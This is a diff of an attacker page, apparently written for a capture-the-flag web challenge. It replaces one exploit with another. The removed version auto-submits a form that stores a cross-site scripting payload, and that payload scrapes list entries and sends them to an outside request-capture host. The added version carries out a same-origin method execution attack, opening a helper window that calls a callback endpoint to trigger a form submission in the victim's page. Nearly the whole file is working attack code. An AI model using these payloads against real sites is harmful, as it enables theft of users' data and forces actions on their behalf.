--- a/attacker.html
+++ b/attacker.html
@@ -1,12 +1,27 @@
-<!DOCTYPE html>
-<html>
+<!doctype html>
+<html lang="en">
+<head>
+  <meta charset="utf-8">
+  <title>SOME</title>
+</head>
 <body>
-<form id="f" method="POST" action="http://localhost:3001/note">
-  <textarea name="content"><script>(async()=>{const entries=[...document.querySelectorAll('.list li')].map(li=>li.innerText).join('\n---\n');await fetch('https://pcitgol.request.dreamhack.games/?d='+encodeURIComponent(entries));})();</script></textarea>
-</form>
 <script>
-  document.getElementById('f').submit();
-  setTimeout(()=>location='http://localhost:3001/note',1500);
+const target = 'http://127.0.0.1:8001';
+const callbackPath = 'opener.document.body.firstElementChild.nextElementSibling.firstElementChild.nextElementSibling.nextElementSibling.submit';
+const helper = window.open('', '_blank');
+if (helper) {
+  helper.document.write(`<!doctype html><script>
+    const target = '${target}';
+    const cb = '${callbackPath}';
+    setTimeout(() => {
+      location = target + '/callback?callback=' + encodeURIComponent(cb);
+    }, 1500);
+  <\/script>`);
+  helper.document.close();
+}
+setTimeout(() => {
+  window.location = target + '/post';
+}, 300);
 </script>
 </body>
 </html>
